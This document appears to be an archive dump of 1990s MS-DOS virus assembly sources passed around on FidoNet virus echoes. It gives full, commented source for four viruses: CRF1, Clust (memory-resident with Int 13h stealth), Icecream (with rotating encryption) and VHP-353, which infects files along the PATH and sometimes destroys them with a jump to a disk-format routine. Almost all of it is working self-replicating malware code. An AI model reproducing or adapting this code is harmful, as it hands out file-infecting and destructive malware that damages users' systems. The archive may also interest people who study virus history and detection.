; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CRF.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Fred Lee, 2:283/718 (06 Nov 94 17:46)
;* To : Mike Nisbett
;* Subj : CRF.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org
title "CRF1 virus. Born on the Fourth of July. Written by TBSI."
page 60,80
code segment word public 'code'
assume cs:code,ds:code
org 100h
main proc;edure
; As referenced in this source listing, Top-Of-File represents location 100h in
; the current memory segment, which is where the virus code is loaded into mem.
; The word "program" refers to the infected programs code and "virus" refers to
; the virus's code. This information is included to clarify my use of the word
; "program" in the remarks throughout this listing.
; Since the virus (with the exception of "call skip" and "db 26") can be loaded
; anywhere in memory depending on the length of the infected program, I made it
; to where the BP register would be loaded with the displacement of the code in
; memory. This was done as follows:
; 1) a CALL instruction was issued. It places the TRUE return
; address onto the stack.
; 2) instead of returning to there, the value was popped off of
; the stack into the BP register
; 3) then, it subtracts the EXPECTED value of BP (the address of
; EOFMARK in the 1st-time copy) from BP to get the offset.
; 4) all references to memory locations were thereafter changed
; to refernces to EXPECTED memory locations + BP
; This fixed the problem.
tof: ;Top-Of-File
jmp short begin ;Skip over program
nop ;Reserve 3rd byte
EOFMARK: db 26 ;Disable DOS's TYPE
first_four: nop ;First run copy only!
address: int 20h ;First run copy only!
check: nop ;First run copy only!
begin: call nextline ;Push BP onto stack
nextline: pop bp ;BP=location of Skip
sub bp,offset nextline ;BP=offset from 1st run
mov byte ptr [bp+offset infected],0 ;Reset infection count
lea si,[bp+offset first_four] ;Original first 4 bytes
mov di,offset tof ;TOF never changes
mov cx,4 ;Lets copy 4 bytes
cld ;Read left-to-right
rep movsb ;Copy the 4 bytes
mov ah,1Ah ;Set DTA address ...
lea dx,[bp+offset DTA] ; ... to *our* DTA
int 21h ;Call DOS to set DTA
mov ah,4Eh ;Find First ASCIIZ
lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0
lea si,[bp+offset filename] ;Point to file
push dx ;Save DX
jmp short continue ;Continue...
return: mov ah,1ah ;Set DTA address ...
mov dx,80h ; ... to default DTA
int 21h ;Call DOS to set DTA
xor ax,ax ;AX= 0
mov bx,ax ;BX= 0
mov cx,ax ;CX= 0
mov dx,ax ;DX= 0
mov si,ax ;SI= 0
mov di,ax ;DI= 0
mov sp,0FFFEh ;SP= 0
mov bp,100h ;BP= 100h (RETurn addr)
push bp ; Put on stack
mov bp,ax ;BP= 0
ret ;JMP to 100h
nextfile: or bx,bx ;Did we open the file?
jz skipclose ;No, so don't close it
mov ah,3Eh ;Close file
int 21h ;Call DOS to close it
xor bx,bx ;Set BX back to 0
skipclose: mov ah,4Fh ;Find Next ASCIIZ
continue: pop dx ;Restore DX
push dx ;Re-save DX
xor cx,cx ;CX= 0
xor bx,bx
int 21h ;Find First/Next
jnc skipjmp
jmp NoneLeft ;Out of files
skipjmp: mov ax,3D02h ;open file
mov dx,si ;point to filespec
int 21h ;Call DOS to open file
jc nextfile ;Next file if error
mov bx,ax ;get the handle
mov ah,3Fh ;Read from file
mov cx,4 ;Read 4 bytes
lea dx,[bp+offset first_four] ;Read in the first 4
int 21h ;Call DOS to read
cmp byte ptr [bp+offset check],26 ;Already infected?
je nextfile ;Yep, try again ...
cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE?
je nextfile ;Yep, maybe next time!
mov ax,4202h ;LSeek to EOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek
cmp ax,0FD00h ;Longer than 63K?
ja nextfile ;Yep, try again...
mov [bp+offset addr],ax ;Save call location
mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;Point to buffer
int 21h ;Save the first 4 bytes
mov ah,40h ;Write to file
mov cx,offset eof-offset begin ;Length of target code
lea dx,[bp+offset begin] ;Point to virus start
int 21h ;Append the virus
mov ax,4200h ;LSeek to TOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek
mov ax,[bp+offset addr] ;Retrieve location
inc ax ;Adjust location
mov [bp+offset address],ax ;address to call
mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst.
mov byte ptr [bp+offset check],26 ;EOFMARK
mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;4 bytes are at [DX]
int 21h ;Write to file
inc byte ptr [bp+offset infected] ;increment counter
jmp nextfile ;Any more?
NoneLeft: cmp byte ptr [bp+offset infected],2 ;At least 2 infected?
jae TheEnd ;The party's over!
mov di,100h ;DI= 100h
cmp word ptr [di],20CDh ;an INT 20h?
je TheEnd ;Don't go to prev. dir.
lea dx,[bp+offset prevdir] ;'..'
mov ah,3Bh ;Set current directory
int 21h ;CHDIR ..
jc TheEnd ;We're through!
mov ah,4Eh
jmp continue ;Start over in new dir
TheEnd: jmp return ;The party's over!
filespec: db '*.COM',0 ;File specification
prevdir: db '..',0 ;previous directory
; None of this information is included in the virus's code. It is only used
; during the search/infect routines and it is not necessary to preserve it
; in between calls to them.
eof:
DTA: db 21 dup (?) ;internal search's data
attribute db ? ;attribute
file_time db 2 dup (?) ;file's time stamp
file_date db 2 dup (?) ;file's date stamp
file_size db 4 dup (?) ;file's size
filename db 13 dup (?) ;filename
infected db ? ;infection count
addr dw ? ;Address
main endp;rocedure
code ends;egment
end main
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;-+- GEcho 1.00
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;Options: /m = map file with publics
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

252
MSDOS/Virus.MSDOS.Unknown.vir50.asm Normal file
View File

@ -0,0 +1,252 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 40 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CLUST.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:48)
;* To : Daniel Hendry
;* Subj : CLUST.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org
;Clust Virus from TridenT research group - small but fairly interesting,
;it's one of the more advanced from TridenT that I've seen with the
;possible exception of the TPE.
;This virus goes memory resident at the top of lower memory and hooks
;Int 13h. Whenever an EXE file header is written, it checks to see
;if there is a large field of 0's inside it (VERY common in EXE's)
;and, if so, will put itself inside it and change the exe marker bytes
;'MZ' to a jump to that code. In this way, it effectively converts the
;file to a COM file when it is run. After this it re-executes the EXE
;file. Because of a stealth handler on Int 13h function 2 (absolute
;disk read) the EXE file is read as it originally was (the handler
;zero's out the field in which it resides and restores the jump to
;'MZ'). Because of the way this virus works, it can only infect
;smaller EXE files.
;NOTE:
;Several commands are commented out and have the actual bytes entered
;next to them instead. This is because the compiler that Clust was
;originally compiled on used different translations than mine, and
;I wished to preserve the EXACT virus code.
;Disinfection: Because of this virus' stealth routine, disinfection should
; be possible simply by Zipping or Arjing all EXE files on an
; infected disk, then rebooting from a clean disk and unarchiving
; the files. The original archiving MUST be done while the
; virus is active in memory. Also - after rebooting - make
; sure the program you use to unarchive the files is _NOT_
; infected.
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
jmp short EntryPoint
LotsaNOPs db 122 dup (90h) ;Usually will be EXE header....
OldInt13 dd 0
EntryPoint:
db 0e9h,7ch,0 ;jmp InstallVirus
Int13Handler:
cmp ah,3
je IsDiskWrite
cmp ah,2
jne GoInt13
pushf
call cs:OldInt13 ;Call Int 13h
jc Exit13Handler ;Exit on error.
cmp word ptr es:[bx],7EEBh ;Is sector infected?
jne Exit13Handler
mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ'
push di cx ax ;Stealth routine.....
mov cx,115h
xor ax,ax
db 89h,0dfh ;mov di,bx
;Zero out virus from
add di,80h ;sector when it is read.
rep stosb
pop ax cx di
Exit13Handler:
iret
GoInt13:
jmp cs:[OldInt13]
IsDiskWrite:
cmp word ptr es:[bx],5A4Dh ;Is EXE file being written?
jne GoInt13
cmp word ptr es:[bx+4],75h ;Is file too large?
jae GoInt13
push ax cx si di ds
push es
pop ds
db 89h,0deh ;mov si,bx
add si,80h ;Look in EXE header....
mov cx,115h
AllZeros:
lodsb
cmp al,0
loopz AllZeros
cmp cx,0 ;Check to see if entire field
jne ExitInfectHandler ;was zeroed - leave if not.
db 89h,0dfh ;mov di,bx
add di,80h
mov cx,115h
mov si,offset OldInt13
push cs
pop ds
rep movsb
db 89h,0dfh ;mov di,bx
;Copy virus
;over zero area in EXE header.
mov ax,7EEBh ;Stick in Jump over 'MZ'
stosw
ExitInfectHandler:
pop ds di si cx ax ;Allow Write to process now.
jmp short GoInt13
InstallVirus:
mov ax,3513h
int 21h ;Get Int 13 addres
mov word ptr cs:[OldInt13],bx
mov word ptr cs:[OldInt13+2],es
mov ah,0Dh
int 21h ;Flush disk buffers
mov ah,36h
mov dl,0
int 21h ;Get free space on default drive
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:0,'Z' ;Are we the last chain?
jne Terminate ;If not, terminate.
;sub word ptr ds:[3],39h ;subtract from MCB size
db 81h,2eh,03,0,39h,0
;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem
db 81h,2eh,12h,0,39h,0
mov si,offset OldInt13
db 89h,0f7h ;mov di,si
mov es,ds:[12h] ;ES = new segment
push cs
pop ds
mov cx,115h ;Copy virus into memory
rep movsb
mov ax,2513h
push es
pop ds
mov dx,offset Int13Handler
int 21h ;Set int 13 to virus handler
mov ah,4Ah
push cs
pop es
mov bx,39h
int 21h ;Modify mem alloc.
push cs
pop ds
mov bx,ds:[2ch] ;Get environment segment
mov es,bx
xor ax,ax
mov di,1
ScanForFilename: ;Find name of file executed
dec di ;in environment strings...
scasw ;(located after two 0's)
jnz ScanForFilename
lea si,[di+2]
push bx
pop ds ;DS = environment segment
push cs
pop es ;ES = code segment
mov di,offset Filename
push di
xor bx,bx
CopyFilename:
mov cx,50h
inc bx
lodsb
cmp al,0
jne StoreFilename ;Change zero at end of
mov al,0Dh ;filename to a return
StoreFilename:
stosb
cmp al,0Dh ;If it was a return, we're
loopnz CopyFilename ;done copying the filename
mov byte ptr ds:[28fh],bl
push cs
pop ds
pop si
dec si
int 2Eh ;Re-execute EXE file with
;Stealth handler in memory,
;so Exe is run w/o virus.
Terminate:
mov ah,4Ch
int 21h
db 0
Filename db 1
end start
;-+- Terminate 1.50/Pro
; + Origin: Fred's Place (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

292
MSDOS/Virus.MSDOS.Unknown.vir51.asm Normal file
View File

@ -0,0 +1,292 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 41 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : ICECREAM.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Dr T , 2:283/718 (06 Nov 94 17:48)
;* To : Ron Toler
;* Subj : ICECREAM.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
;Icecream Virus by the TridenT virus research group.
;This is a simple direct-action com virus that uses one of
;4 encryption algorithms to encrypt itself each time it infects a file.
;It will infect one .COM file in the current directory every time it is
;executed. It marks infections with the time stamp.
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
db 0e9h,0ch,0 ;jmp Virus_Entry
Author_Name db 'John Tardy'
db 0E2h,0FAh
Virus_Entry:
push ax
call Get_Offset
Get_Offset:
pop ax
sub ax,offset Get_Offset
db 89h,0c5h ;mov bp,ax
lea si,[bp+Storage]
mov di,100h ;Restore file
movsw
movsb
mov ah,1Ah
mov dx,0f900h
int 21h ;Set DTA
mov ah,4Eh
FindFirstNext:
lea dx,[bp+ComMask]
xor cx,cx
int 21h ;Find File
jnc InfectFile
Restore_DTA:
mov ah,1Ah
mov dx,80h
int 21h ;Set DTA to default
mov bx,offset start
pop ax ;Return to host
push bx
retn
InfectFile:
mov ax,4300h
mov dx,0f91eh
int 21h ;Get file attribs
push cx ;save 'em
mov ax,4301h
xor cx,cx
int 21h ;Set them to 0
mov ax,3D02h
int 21h ;Open file
mov bx,5700h
xchg ax,bx
int 21h ;Get file time
push cx
push dx ;save it
and cx,1Fh
cmp cx,1 ;check for infection
jne ContinueInfection
db 0e9h,69h,0 ;jmp DoneInfect
ContinueInfection:
mov ah,3Fh
lea dx,[bp+Storage]
mov cx,3
int 21h ;Read in first 3 bytes
mov ax,cs:[Storage+bp]
cmp ax,4D5Ah ;Is it an EXE?
je DoneInfect
cmp ax,5A4Dh
je DoneInfect ;Other EXE signature?
pop dx
pop cx
and cx,0FFE0h ;Change stored time values
or cx,1 ;to mark infection
push cx
push dx
mov ax,4202h ;Go to the end of the file
call Move_FP
sub ax,3
mov cs:[JumpSize+bp],ax ;Save jump size
add ax,10Fh ;Save encryption starting
mov word ptr [bp+EncPtr1+1],ax ;point....
mov word ptr [bp+EncPtr2+1],ax
mov word ptr [bp+EncPtr3+1],ax
mov word ptr [bp+EncPtr4+1],ax
call SetupEncryption ;Encrypt virus
mov ah,40h
mov dx,0fa00h
mov cx,1F5h
int 21h ;Write virus to file
mov ax,4200h
call Move_FP ;Go to the beginning of file
mov ah,40h
lea dx,[bp+JumpBytes]
mov cx,3
int 21h ;Write in jump
call FinishFile
jmp Restore_DTA
DoneInfect:
call FinishFile
mov ah,4Fh
jmp FindFirstNext
Move_FP:
xor cx,cx
xor dx,dx
int 21h
ret
FinishFile:
pop si dx cx
mov ax,5701h ;Reset file time/date stamp
int 21h ;(or mark infection)
mov ah,3Eh
int 21h ;Close new host file
mov ax,4301h
pop cx
mov dx,0fc1eh
int 21h ;Restore old attributes
push si
retn
Message db ' I scream, you scream, we both '
db 'scream for an ice-cream! '
SetupEncryption:
xor byte ptr [bp+10Dh],2
xor ax,ax
mov es,ax
mov ax,es:[46ch] ;Get random number
push cs
pop es
push ax
and ax,7FFh
add ax,1E9h
mov word ptr [bp+EncSize1+1],ax
mov word ptr [bp+EncSize2+1],ax
mov word ptr [bp+EncSize3+1],ax
mov word ptr [bp+EncSize4+1],ax
pop ax
push ax
and ax,3
shl ax,1
mov si,ax
mov ax,[bp+si+EncData1]
add ax,bp
mov si,ax
lea di,[bp+103h]
movsw
movsw
movsw
movsw ;Copy Encryption Algorithm
pop ax
stosb
movsb
mov dl,al
lea si,[bp+103h]
mov di,0fa00h
mov cx,0Ch
rep movsb
lea si,[bp+10Fh]
mov cx,1E9h
EncryptVirus:
lodsb
db 30h,0d0h ;xor al,dl
stosb
loop EncryptVirus
cmp dl,0
je KeyWasZero
retn
KeyWasZero: ;If key is zero, increase
mov si,offset AuthorName ;jump size and place name
mov di,0fa00h ;at beginning....
mov cx,0Ah
rep movsb
mov ax,cs:[JumpSize+bp]
add ax,0Ch
mov cs:[JumpSize+bp],ax
retn
db '[TridenT]'
EncData1 dw 02beh
EncData2 dw 02c7h
EncData3 dw 02d0h
EncData4 dw 02d9h
Encryptions:
;------------------------------------------------------------
EncPtr1:
mov si,0
EncSize1:
mov cx,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncPtr2:
mov di,0
EncSize2:
mov cx,0
xor byte ptr [di],47h
;------------------------------------------------------------
EncSize3:
mov cx,0
EncPtr3:
mov si,0
xor byte ptr [si],46h
;------------------------------------------------------------
EncSize4:
mov cx,0
EncPtr4:
mov di,0
xor byte ptr [di],47h
;------------------------------------------------------------
AuthorName db 'John Tardy'
JumpBytes db 0E9h
JumpSize dw 0
ComMask db '*.CoM',0
Storage dw 20CDh
db 21h
end start
;-+- GEcho 1.10+
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/x Include false conditionals in listing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

306
MSDOS/Virus.MSDOS.Unknown.vir52.asm Normal file
View File

@ -0,0 +1,306 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 42 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : V_VHP353.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 17:49)
;* To : Adam Happ
;* Subj : V_VHP353.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org
page ,132
name VHP_353
title Virus; based on the famous VHP-648 virus
.radix 16
code segment
assume cs:code,ds:code
org 100
environ equ 2C
newjmp equ 7Bh ;Code of jmp instruction
codeptr equ 7A ;Here is formed a jump to the virus code
pname equ 78 ;Offset of file name in the dir path
poffs equ 76 ;Offset in the contents of the `PATH' variable
errhnd equ 74 ;Save place for the old error handler
fname equ 70 ;Path name to search for
mydta equ 2C ;DTA for Find First/Next:
attrib equ 17 ;File attribute
time equ 16 ;File time
date equ 14 ;File date
fsize equ 12 ;File size
namez equ 0E ;File name found
start:
jmp short begin
nop
int 20
saveins db 3 dup (90) ;Original first 3 bytes
begin:
call virus ;Detrmine the virus start address
data label byte ;Data section
allcom db '*.COM',0 ;Filespec to search for
pathstr db 'PATH='
;This replaces the first instruction of a destroyed file.
;It's a JMP instruction into the hard disk formatting program (IBM XT only):
bad_jmp db 0EA,6,0,0,0C8
virus:
pop bx ;Make BX pointed at data
mov di,offset start ;Push the program true start address
push di ; onto the stack
push ax ;Save AX
cld
lea si,[bx+saveins-data] ;Original instruction saved there
movsw ;Move 2 + 1 bytes
movsb
mov si,bx ;Keep SI pointed at data
lea bp,[bx+endcode-data+7A] ;Reserve local storage
mov ax,3524 ;Get interrupt 24h handler
int 21 ; and save it in errhnd
mov [bp-errhnd],bx
mov [bp-errhnd+2],es
mov ah,25 ;Set interrupt 24h handler
lea dx,[si+handler-data]
cmp al,0 ;DOS < 2.0 zeroes AL
je exit ;Exit if version < 2.0
push ds
int 21
lea dx,[bp-mydta]
mov ax,1A00 ;Set DTA
int 21
xor di,di ;Point ES:DI at the environment start
mov es,ds:[di+environ] ;Environment address
mov bx,si
search: ;Search 'PATH' in the environment
lea si,[bx+pathstr-data]
mov cx,5 ;5 letters in 'PATH='
repe cmpsb
je pfound ;PATH found, continue
mov ch,80 ;Maximum 32 K in environment
repne scasb ;If not, skip through next 0
scasb ;End of environment?
dec di
jc search ;If not, retry
pfound:
pop es ;Restore ES
mov [bp-poffs],di ;Save 'PATH' offset in poffs
lea di,[bp-fname]
mov [bp-pname],di
filesrch:
lea si,[bx+allcom-data]
movsw
movsw ;Move '*.COM' at fname
movsw
mov si,bx ;Restore SI
mov ah,4E ;Find first file
lea dx,[bp-fname]
mov cl,11b ;Hidden, Read/Only or Normal files
jmp short findfile
checkfile:
mov al,[bp-time] ;Check file time
and al,11111b ; (the seconds, more exactly)
cmp al,62d/2 ;Are they 62?
;If so, file is already contains the virus, search for another:
je findnext
;Is 10 <= file_size <= 64,000 bytes?
sub word ptr [bp-fsize],10d
cmp [bp-fsize],64000d-10d+1
jc process ;If so, process the file
findnext: ;Otherwise find the next file
mov ah,4F ;Find next file
findfile:
int 21
jnc checkfile ;If found, go chech some conditions
nextdir:
mov si,[bp-poffs] ;Get the offset in the PATH variable
lea di,[bp-fname] ;Point ES:DI at fname
mov ds,ds:[environ] ;Point DS:SI at the PATH variable found
cmp byte ptr [si],0 ;0 means end of PATH
jnz cpydir
olddta:
mov ax,2524 ;Set interrupt 24h handler
lds dx,dword ptr [bp-errhnd]
int 21
push cs
pop ds ;Restore DS
exit:
mov ah,1A ;Set DTA
mov dx,80 ;Restore DTA
int 21
pop ax
ret ;Go to CS:IP by doing funny RET
cpydir:
lodsb ;Get a char from the PATH variable
cmp al,';' ;`;' means end of directory
je enddir
cmp al,0 ;0 means end of PATH variable
je enddir
stosb ;Put the char in fname
jmp cpydir ;Loop until done
enddir:
push cs
pop ds ;Restore DS
mov [bp-poffs],si ;Save the new offset in the PATH variable
mov al,'\' ;Add '\'
stosb
mov [bp-pname],di
jmp filesrch ;And go find the first *.COM file
process:
mov di,dx ;[bp-pname]
lea si,[bp-namez] ;Point SI at namez
cpyname:
lodsb ;Copy name found to fname
stosb
cmp al,0
jne cpyname
mov si,bx ;Restore SI
mov ax,4301 ;Set file attributes
call clr_cx_dos
mov ax,3D02 ;Open file with Read/Write access
int 21
jc oldattr ;Exit on error
mov bx,ax ;Save file handle in BX
mov ah,2C ;Get system time
int 21
and dh,111b ;Are seconds a multiple of 8?
jnz infect ;If not, contaminate file (don't destroy):
;Destroy file by rewriting the first instruction:
mov cx,5 ;Write 5 bytes
lea dx,[si+bad_jmp-data] ;Write THESE bytes
jmp short do_write ;Do it
;Try to contaminate file:
;Read first instruction of the file (first 3 bytes) and save it in saveins:
infect:
mov ah,3F ;Read from file handle
mov cx,3 ;Read 3 bytes
lea dx,[si+saveins-data] ;Put them there
call dos_rw
jc oldtime ;Exit on error
;Move file pointer to end of file:
mov ax,4202 ;LSEEK from end of file
call clr_dx_cx_dos
mov [bp-codeptr],ax ;Save result in codeptr
mov cx,endcode-saveins ;Virus code length as bytes to be written
lea dx,[si+saveins-data] ;Write from saveins to endcode
call dos_write ;Write to file handle
jc oldtime ;Exit on error
call lseek ;LSEEK to the beginning of the file
;Rewrite the first instruction of the file with a jump to the virus code:
mov cl,3 ;3 bytes to write
lea dx,[bp-newjmp] ;Write THESE bytes
do_write:
call dos_write ;Write to file handle
oldtime:
mov dx,[bp-date] ;Restore file date
mov cx,[bp-time] ; and time
or cl,11111b ;Set seconds to 62 (the virus' marker)
mov ax,5701 ;Set file date & time
int 21
mov ah,3E ;Close file handle
int 21
oldattr:
mov ax,4301 ;Set file attributes
mov cx,[bp-attrib] ;They were saved in attrib
and cx,3F
lea dx,[bp-fname]
int 21 ;Do it
jmp olddta ;And exit
lseek:
mov ax,4200 ;LSEEK from the beginning of the file
clr_dx_cx_dos:
xor dx,dx ;From the very beginning
clr_cx_dos:
xor cx,cx ;Auxiliary entry point
db 3Dh ;Trick
dos_write:
mov ah,40 ;Write to file handle
dos_rw:
int 21
jc dos_ret ;Exit on error
cmp ax,cx ;Set CF if AX < CX
dos_ret:
ret
handler: ;Critical error handler
mov al,0 ;Just ignore the error
iret ; and return
db 0E9 ;The JMP opcode
endcode label byte
code ends
end start
;-+- GoldED/386 2.50.B1016+
; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/t Suppress messages if successful assembly
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

340
MSDOS/Virus.MSDOS.Unknown.vir53.asm Normal file
View File

